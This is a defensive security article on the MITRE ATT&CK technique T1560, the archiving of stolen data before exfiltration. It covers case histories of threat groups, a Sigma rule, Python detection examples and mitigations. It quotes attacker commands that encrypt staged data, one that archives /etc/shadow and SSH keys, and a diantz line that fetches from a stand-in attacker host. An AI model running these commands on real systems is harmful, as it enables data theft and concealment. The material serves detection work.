T1560 — Archive Collected Data — describes the adversary behavior of compressing and/or encrypting data that has already been collected on a victim system, in preparation for exfiltration. It sits within the Collection tactic and nearly always precedes a T1041 or T1048 exfiltration step.
The logic is straightforward: raw files are large, structurally identifiable, and potentially inspectable by data loss prevention (DLP) tooling or network proxies. A password-protected RAR archive is none of those things. It blends in with normal file transfers, resists content inspection, and reduces the volume of data that needs to move across the wire — which in turn lowers the chance of triggering bandwidth anomaly alerts.
MITRE notes this technique cannot be easily mitigated with preventive controls because it abuses legitimate system features. Standard archiving and encryption utilities exist on almost every operating system. The same command a sysadmin uses to back up a directory is the same command an attacker uses to pack up stolen credentials.
The Three Sub-Techniques
T1560 has three sub-techniques, each reflecting a different method an attacker might use to accomplish the same goal.
Archive via Utility
Standalone tools: 7-Zip, WinRAR, WinZip, tar, gzip, bzip2, diantz/makecab (Windows cabinet files), certutil for Base64 encoding. These are pre-installed on many systems or dropped by the attacker.
Archive via Library
Archival libraries called from within malware — rarfile, libzip, zlib — without invoking a separate subprocess. No child process is created; compression happens inside the implant itself. Harder to detect.
Archive via Custom Method
Hand-rolled encryption or compression: XOR ciphers, stream ciphers, custom implementations of known algorithms. No external library reference means no behavioral signature to match. Used by nation-state implants.
Where T1560 Fits in the Kill Chain
T1560 does not happen in isolation. In a typical intrusion it occupies a very specific position — after collection is complete and before data actually leaves the network. Because archiving almost always precedes exfiltration, a detection event at this stage represents a last-chance opportunity to intervene before data leaves the organization.
The presence of T1560 activity on a system that has experienced prior suspicious behavior should be treated as a high-confidence indicator of an active, advanced intrusion — not a false positive to tune out.
Tools, Commands, and Common Patterns
The following examples represent commands that have appeared in real threat actor toolkits and incident response investigations.
WinRAR — The Most Commonly Observed Utility
WinRAR remains the archiving tool seen most frequently in APT and ransomware investigations. Attackers either bring their own copy of rar.exe or rely on an existing installation.
```
# Archive with AES-256 encryption and password, max compression
rar.exe a -dh -hp[PASSWORD] -m5 C:\ProgramData\staging\1.rar C:\ProgramData\staging\data.txt

# Multi-volume archive split into 50MB chunks for staged exfiltration
rar.exe a -v50m -hp[PASSWORD] -r output.rar C:\Users\

# Seen in APT28 campaigns: target specific file types recursively
rar.exe a -hp[PASSWORD] -n*.doc -n*.docx -n*.pdf -n*.xls exfil.rar C:\
```
The -hp flag in WinRAR (and -mhe in 7-Zip) enables header encryption, which hides filenames inside the archive — not just file contents. This defeats metadata-level content inspection tools. Its presence outside of known backup workflows is a meaningful indicator of malicious intent.
7-Zip
7-Zip is widely used due to its open-source availability and strong AES-256 encryption. FIN7 infrastructure exposed in 2023 included native 7-Zip binaries alongside OpenSSH tools used to establish reverse tunnels for data routing.
```
# Password-protected 7z archive with header encryption
7z.exe a -p[PASSWORD] -mhe=on archive.7z C:\Users\target\Documents\

# Maximum compression, encrypted headers (hides all filenames)
7z.exe a -t7z -mx=9 -mhe -p[PASSWORD] out.7z .\collected\
```
Windows Built-in: diantz / makecab
diantz.exe is a LOLBin natively present on Windows. It creates cabinet (.cab) files and can fetch files from remote locations before compressing them — combining collection and archiving in a single step. MITRE documents this specifically for its overlap with Remote Data Staging.
```
# Create a cabinet file from a local file
diantz.exe targetfile.txt output.cab

# Download and compress remotely in one step
diantz.exe /F http://attacker.com/directives.ddf
```
certutil — Base64 Encoding as Obfuscation
certutil is frequently used to Base64-encode collected data before transfer, so that it passes as plain text through content filters. It requires no additional tools and leaves minimal artifacts outside of process-creation logs.
```
certutil -encode C:\staged\dump.bin C:\staged\dump.b64
```
Linux and macOS: tar + openssl Pipeline
On Unix-like systems, attackers chain standard utilities. Context — parent process, invocation path, output directory, timing — is what separates legitimate use from malicious staging.
```
# Compress and encrypt in one pipeline — common in server compromises
tar -czf - /home/target/ | openssl enc -aes-256-cbc -salt -pass pass:[PASSWORD] > /tmp/.cache/out.enc

# Seen in OceanLotus (APT32) Linux server targeting
tar -zcvf /tmp/.x/results.tar.gz /etc/passwd /etc/shadow /root/.ssh/
```
Confirmed Threat Actor Incidents
T1560 appears in the documented TTP profiles of dozens of confirmed threat groups and has been identified as a contributing factor in some of the most consequential breaches in history. The following incidents are drawn from public indictments, government advisories, and vendor threat intelligence reports.
The 2018 Mueller indictment of twelve GRU Unit 26165 officers (United States v. Netyksho et al.) provides one of the most detailed public records of T1560 in nation-state use. After gaining access to the DNC and DCCC networks in 2016, APT28 operators used X-Agent to collect emails, documents, and credentials, then staged and compressed the data before exfiltrating it through encrypted channels via their X-Tunnel implant. Stolen files were packaged and shipped to GRU-controlled infrastructure in Arizona before being distributed through DCLeaks and WikiLeaks.
In 2023, Google's TAG observed APT28 exploiting the WinRAR CVE-2023-38831 zero-day in campaigns against Ukrainian entities — using malicious RAR archives as both a delivery mechanism and a data staging tool in the same operation, demonstrating how archiving utilities serve dual offensive roles.
North Korea's Lazarus Group conducted one of the most destructive corporate intrusions on record against Sony Pictures Entertainment. Before deploying wiper malware, operators collected and staged massive volumes of data — unreleased films, executive emails, employee SSNs, salary records — all packaged before transmission. Lazarus's IndiaIndia malware writes harvested victim data to %TEMP%, then compresses and encrypts the file before uploading to a C2 server — T1560 baked directly into the binary.
Across years of campaigns, Lazarus consistently stages collected files and credential caches locally before exfiltration, minimizing C2 connection volume and reducing detection opportunities. RAR archives are a documented standard staging tool across Lazarus campaigns from 2014 through their 2024–2025 cryptocurrency exchange operations, including the $1.5 billion Bybit theft in February 2025.
Mandiant's 2024 DUSTTRAP report documented APT41 hitting organizations across shipping, logistics, media, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the UK, with persistent access maintained since at least 2023. APT41 used SQLULDR2 to export Oracle database contents and PINEGROVE to package and exfiltrate large data volumes to Microsoft OneDrive — using cloud storage to blend encrypted archives into legitimate traffic.
The group also leveraged certutil.exe to download their DUSTPAN dropper — the same Windows binary used elsewhere in T1560.001 operations to Base64-encode staged data — demonstrating consistent dual-use of LOLBins across both delivery and archiving phases of the same intrusion.
Black Basta emerged in April 2022 and claimed over 90 victims within six months. SentinelOne research established strong links to FIN7 (Carbanak) through shared custom tooling and overlapping infrastructure. The group's double-extortion model requires data to be stolen and compressed before encryption, ensuring leverage even if victims restore from backups. WinRAR was used to package harvested credentials and internal documents, with SystemBC SOCKS5 proxy routing archives through proxied connections to reduce attribution surface.
FIN7's own staging infrastructure, exposed during investigation of their Diceloader C2, contained native 7-Zip binaries alongside OpenSSH tools — combined to compress collected data and route it through reverse SSH tunnels configured as scheduled tasks for persistence across reboots. A representative observed command: rar.exe a -dh -hp[PASSWORD] -m5 C:\ProgramData\1.rar C:\ProgramData\1.txt
Russia's FSB-linked Turla group is among the earliest documented practitioners of T1560.003 at scale. Kaspersky's Epic Turla analysis documented custom compression and encryption baked into their implant toolchain — handling archiving internally rather than invoking external utilities. Turla's LightNeuron email implant, analyzed by ESET in 2019, used custom encryption when archiving stolen email content: no child process, no command-line flag, no event log entry tied to an archiving tool. A 2023 report on Turla TTPs confirmed their ongoing preference for splitting archives into small segments to evade size-based anomaly detection on outbound flows.
ESET's 2019 research on OceanLotus decoys documented the group using zip and tar archives to package collected data from Linux-based government servers before tunneling it through encrypted channels. A 2023 Palo Alto Unit 42 report on cyberespionage against Southeast Asian government entities linked to Stately Taurus (Mustang Panda) showed operators using command-line archive tools to create password-protected archives in temp directories before HTTPS exfiltration — a pattern consistent across multiple Vietnamese-attributed campaigns over several years.
Symantec's Dragonfly documentation and the 2018 US-CERT advisory TA18-074A on Russian government cyber activity targeting critical infrastructure both explicitly called out archiving and encryption as a pre-exfiltration step. Operators collected configuration files, credentials, and engineering diagrams from energy companies in the United States, Europe, and Turkey and compressed them before exfiltration. In an ICS context, engineering schematics and control system configurations compressed into a single encrypted archive represent a near-complete blueprint for a future disruptive attack — making T1560 detection especially high-stakes in OT environments.
Cybereason's 2022 analysis of Operation CuckooBees revealed a decade-long intrusion attributed to the Winnti Group targeting pharmaceutical and technology firms for IP. The operators used custom loaders and stealthy compression techniques that avoided spawning child processes — consistent with T1560.002 — to bundle collected source code, documents, and manufacturing blueprints before staging. The campaign's extraordinary longevity demonstrates that library-based archiving inside a malware implant can extend dwell time for years without triggering standard detection logic tuned to child process creation.
CISA's December 2023 advisory AA23-352A on Play Ransomware explicitly documented T1560 as a confirmed technique, with WinRAR used consistently for data staging prior to exfiltration. Trend Micro's July 2023 Ransomware Spotlight confirmed archives are created in staging directories — frequently C:\ProgramData\ or user temp paths — before transfer. Play targeted critical infrastructure, healthcare, and government entities with a double-extortion model requiring this pre-encryption data packaging step.
KISA's Operation Muzabi analysis (referenced in MITRE's T1560 documentation) documented Kimsuky operators using archiving as part of phishing-to-exfiltration chains targeting South Korean entities. A 2024 S2W report on Troll Stealer — a Kimsuky-attributed implant signed with a valid certificate — showed it collecting and compressing SSH key material, browser data, and documents into encrypted archives before C2 delivery. Kimsuky's use of T1560 is consistent across implant generations: from early GoldDragon malware through Troll Stealer in 2024, the collect-compress-exfiltrate sequence has remained a constant in every documented campaign.
Detection Guidance
MITRE ATT&CK v18 added a formal detection strategy for T1560 (DET0526, created October 2025), targeting three primary surfaces: process execution, file creation patterns, and process lineage anomalies.
| Data Source | What to Look For | Notes |
|---|---|---|
| Process Creation | Execution of rar.exe, 7z.exe, makecab.exe, diantz.exe, tar, gzip, bzip2, openssl enc with compression or encryption switches | Flag especially when invoked by non-standard parent processes: Office apps, IIS workers, web shells, scheduled tasks on servers |
| File Creation | Large files with extensions .rar, .zip, .7z, .cab, .tar.gz, .enc appearing in C:\ProgramData\, %TEMP%, /tmp, /var/tmp | Correlate with process execution events. A .rar created by a process other than a user shell or known backup agent warrants investigation. |
| Command-Line Args | Password flags: -hp (WinRAR header encryption), -p (7-Zip), -pass (openssl). Recursive: -r. Delete after archive: -df in WinRAR. | Header encryption hides filenames. Outside known backup workflows, its use is a strong malicious indicator. |
| Process Lineage | Archiving tools launched from scheduled tasks, services, web shells, or unexpected parent binaries. Abnormal crypt32.dll usage. | IIS worker spawning rar.exe is essentially never legitimate. A scheduled task invoking 7z.exe on a DC warrants immediate investigation. |
| PowerShell | Compress-Archive cmdlet invocations in unusual directories or from unexpected processes | Enable Script Block Logging (Event ID 4104). Transcription logging adds coverage for .NET compression calls bypassing Compress-Archive. |
| Network Traffic | Outbound transfers of large files with archive magic bytes following process execution from the categories above | Correlate with DLP events. Encrypted archive headers are identifiable without decrypting content. Flag transfers to cloud storage or unknown ASNs. |
Sigma Detection Rule (T1560.001 — Windows)
```yaml
title: Archive Utility With Encryption Flag in Suspicious Context
id: T1560-001-archive-encryption
status: experimental
description: >
  Detects password-protected archive creation by rar.exe or 7z.exe
  launched from anomalous parent processes
logsource:
  category: process_creation
  product: windows
detection:
  selection_tools:
    Image|endswith:
      - '\rar.exe'
      - '\7z.exe'
      - '\winrar.exe'
  selection_encrypt:
    CommandLine|contains:
      - ' -hp'
      - ' -p'    # 7-Zip glues the password to the switch (-pSecret); ' -p ' with a trailing space would miss it
      - ' -mhe'
  filter_legit_parent:
    ParentImage|contains:
      - 'Explorer.exe'
      - 'cmd.exe'
  condition: selection_tools and selection_encrypt and not filter_legit_parent
falsepositives:
  - Legitimate backup scripts (baseline and suppress known-good)
  - Developers compressing release artifacts
level: high
tags:
  - attack.collection
  - attack.t1560.001
```
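The rule's logic as an added, runnable example (not part of the original article or of any Sigma backend): the three selections are evaluated over constructed Sysmon-style process-creation events, the way a SIEM search would. The parent allowlist and the sample paths are assumptions; the matching accounts for 7-Zip taking its password with no space after -p.

```python
import re

# Image|endswith list from the rule above.
ARCHIVE_TOOLS = ("\\rar.exe", "\\7z.exe", "\\winrar.exe")
# Password / header-encryption switches. 7-Zip glues the password to the
# switch (-pSecret), so a CommandLine pattern of ' -p ' with a trailing
# space would miss it; match the switch and whatever follows it instead.
ENCRYPT_SWITCH = re.compile(r"\s(-hp|-p|-mhe)\S*", re.IGNORECASE)
# ParentImage|contains allowlist from the rule; baseline it per environment.
LEGIT_PARENTS = ("explorer.exe", "cmd.exe")


def matches_rule(event):
    """Evaluate: selection_tools and selection_encrypt and not
    filter_legit_parent. Returns the switch that fired, or None."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    if not image.endswith(ARCHIVE_TOOLS):
        return None
    hit = ENCRYPT_SWITCH.search(event.get("CommandLine", ""))
    if hit is None:
        return None
    if any(p in parent for p in LEGIT_PARENTS):
        return None
    return hit.group(1).lower()


def alerts(events):
    """(parent, image, switch) for every event that fires the rule."""
    out = []
    for e in events:
        switch = matches_rule(e)
        if switch:
            out.append((e["ParentImage"], e["Image"], switch))
    return out


# Constructed process-creation events (Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    # Interactive user packing a backup from Explorer: suppressed by the
    # parent allowlist, which is why that allowlist must be baselined.
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "CommandLine": r"WinRAR.exe a -hp[PASSWORD] D:\backup\photos.rar D:\photos",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # IIS worker process launching a dropped rar.exe with header encryption.
    {"Image": r"C:\ProgramData\rar.exe",
     "CommandLine": r"rar.exe a -dh -hp[PASSWORD] -m5 C:\ProgramData\1.rar C:\ProgramData\1.txt",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    # Scheduled task running 7z with the password glued to -p.
    {"Image": r"C:\Windows\Temp\7z.exe",
     "CommandLine": r"7z.exe a -p[PASSWORD] -mhe=on archive.7z C:\Users\target\Documents",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    # Unencrypted archive from a build job: no password switch, no alert.
    {"Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r"7z.exe a -mx=9 release.zip .\dist",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for parent, image, switch in alerts(SAMPLE_EVENTS):
        print(f"ALERT {switch:5s} {image} <- {parent}")
```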
Library-based and custom-method archiving produce no child process artifacts and no command-line flags to capture. Detection here shifts to memory analysis, behavioral anomalies in post-collection network traffic volume, and file entropy monitoring. Files with abnormally high entropy (approaching 8.0) appearing in staging paths and subsequently transiting the network are a reasonable behavioral indicator. EDR with memory scanning may detect malicious compression routines embedded in implant code.
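As an added example (not part of the original article), the content-level checks a file-monitoring pipeline can apply to a new file in a staging path when no archiving process was observed: the format from magic bytes (including the Salted__ marker that openssl enc -salt writes), whether a RAR archive's headers are encrypted, read from the header alone without decrypting anything, and Shannon entropy. The sample blobs are constructed stubs with zeroed CRC fields, not real archives.

```python
import math
import struct

RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
# (magic bytes, label) for formats named in the detection table above.
MAGIC = [(RAR5_SIG, "rar5"), (RAR4_SIG, "rar4"), (b"7z\xbc\xaf\x27\x1c", "7z"),
         (b"PK\x03\x04", "zip"), (b"\x1f\x8b", "gzip"), (b"BZh", "bzip2"),
         (b"MSCF", "cab"), (b"Salted__", "openssl-enc")]

def shannon_entropy(data):
    """Bits per byte, 0.0 to 8.0; compressed or encrypted data sits near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def read_vint(buf, pos):
    """RAR5 variable-length integer: 7 data bits per byte, MSB = continue."""
    value, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return value, pos

def rar_headers_encrypted(data):
    """WinRAR -hp: RAR5 puts an archive encryption header (type 4) right after
    the signature; RAR4 sets MHD_PASSWORD (0x0080) in the main header flags."""
    if data.startswith(RAR5_SIG):
        pos = len(RAR5_SIG) + 4              # skip signature and header CRC32
        _size, pos = read_vint(data, pos)
        htype, _ = read_vint(data, pos)
        return htype == 4
    if data.startswith(RAR4_SIG):
        # main header: CRC(2) TYPE(1)=0x73 FLAGS(2, little-endian) SIZE(2)
        flags = struct.unpack_from("<H", data, len(RAR4_SIG) + 3)[0]
        return bool(flags & 0x0080)
    return False

def triage(data):
    """Format from magic bytes, header-encryption flag (RAR only), entropy."""
    fmt = next((name for sig, name in MAGIC if data.startswith(sig)), "unknown")
    return {"format": fmt,
            "headers_encrypted": rar_headers_encrypted(data) if fmt.startswith("rar") else None,
            "entropy": round(shannon_entropy(data), 2)}

# Constructed samples: minimal headers (CRC fields left zero) plus a body.
FLAT = bytes(range(256)) * 8            # stand-in for a compressed/encrypted body
SAMPLES = {
    "rar5_hp":   RAR5_SIG + b"\0\0\0\0" + b"\x1a\x04" + FLAT,   # size=26, type=4
    "rar5_open": RAR5_SIG + b"\0\0\0\0" + b"\x0b\x01" + FLAT,   # size=11, type=1
    "rar4_hp":   RAR4_SIG + b"\0\0" + b"\x73" + struct.pack("<H", 0x0080) + b"\x0d\0" + FLAT,
    "openssl":   b"Salted__" + FLAT,
    "csv":       b"user,password_hash\n" * 100,
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items(): print(name, triage(blob))
```

A high-entropy file in a staging path whose format is unknown, followed by an outbound transfer, is the library-based or custom-method case the table cannot catch through process telemetry.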
Mitigations and Hardening
MITRE's formal position is that T1560 cannot be easily mitigated through preventive controls because it abuses legitimate functionality. Defenders have meaningful options at the detection, visibility, and response layers.
- Application control and allowlisting. Where users have no legitimate need to run rar.exe, 7z.exe, or equivalent tools, AppLocker or WDAC policies can block execution outside approved paths. This forces attackers to use LOLBins or switch to library-based archiving — both detectable by different means.
- Full-coverage EDR. Ensure EDR is deployed with complete telemetry on process creation, command-line capture, and file write events. Threat actors routinely survey for unprotected hosts before initiating collection operations — gaps in EDR coverage are exploited deliberately.
- DLP tuning for archive patterns. While encrypted archives resist content inspection, DLP can still trigger on file size thresholds, destination reputation, and outbound data volume. Flagging large encrypted transfers to cloud storage or unknown IP ranges provides a compensating control independent of endpoint telemetry.
- PowerShell Script Block Logging. Enable Event ID 4104 and forward logs to your SIEM. Compress-Archive and ConvertTo-SecureString in unusual contexts are detectable here. Transcription logging adds coverage for direct .NET compression calls.
- Egress filtering and network segmentation. T1560 precedes exfiltration. If data can be archived but cannot leave the network, the objective is frustrated. Strict egress filtering — blocking direct outbound connections from server infrastructure to consumer cloud services and uncommon destination ASNs — addresses the downstream step that T1560 enables.
Related ATT&CK Techniques
| Technique | Relationship to T1560 |
|---|---|
| T1005 — Data from Local System | Collection phase preceding T1560. Operators search local drives, profile directories, and application data stores before staging. |
| T1039 — Data from Network Shared Drive | Collection from SMB shares or mapped drives. Often followed immediately by T1560 to package everything before transfer. |
| T1074 — Data Staged | Closely related: data is placed in a temporary location before or after archiving. T1560 and T1074 frequently appear together in the same intrusion timeline. |
| T1041 — Exfiltration Over C2 Channel | The step following T1560. Detection of T1041 without a corresponding T1560 event may indicate library-based archiving was used, or raw files were sent directly. |
| T1048 — Exfiltration Over Alternative Protocol | Attackers may exfiltrate archives via DNS, ICMP, or web services. The archive format is the same; the carrier changes. |
| T1027 — Obfuscated Files or Information | Overlaps conceptually with archive encryption. The distinction is intent: T1560 is about packaging stolen data; T1027 is about hiding malicious code or commands. |
Key Takeaways
- T1560 is a last-chance detection opportunity. By the time archiving begins, collection is complete. A detection here can stop an exfiltration that survived every earlier control in the kill chain.
- The tools are legitimate — context is everything. WinRAR and 7-Zip are not inherently malicious. Parent process, invocation path, output directory, and timing are what turn a routine tool into an indicator of compromise.
- Header encryption is a strong signal. The -hp and -mhe flags hide filenames inside archives. Outside of known backup workflows, their presence is a meaningful indicator of malicious intent.
- Library-based archiving (T1560.002) is detection-resistant by design. Nation-state implants like Turla's LightNeuron and Winnti's CuckooBees loaders handle compression internally — no child process, no command-line flag, no standard detection trigger. Memory scanning and file entropy analysis are needed here.
- This pattern is universal across actor types. From GRU election interference to North Korean financial crime to ransomware double-extortion, the collect-compress-exfiltrate sequence is a near-constant. If you see it on a host with prior suspicious activity, treat it as a high-confidence signal of an active advanced intrusion.
Sources
- MITRE ATT&CK T1560 and sub-technique pages (v18, 2025)
- Mueller Indictment — United States v. Netyksho (2018)
- Mandiant APT41 / DUSTTRAP report (2024)
- SentinelOne Black Basta / FIN7 analysis (2022, 2023)
- CISA AA23-352A Play Ransomware Advisory (2023)
- Picus Security Lazarus and APT41 TTP analyses
- Cybereason Operation CuckooBees (2022)
- ESET LightNeuron / Turla research (2019)
- Cisco Talos Salt Typhoon report (2025)
- KISA Operation Muzabi / S2W Troll Stealer (2024)
- Google TAG WinRAR CVE-2023-38831 advisory (2023)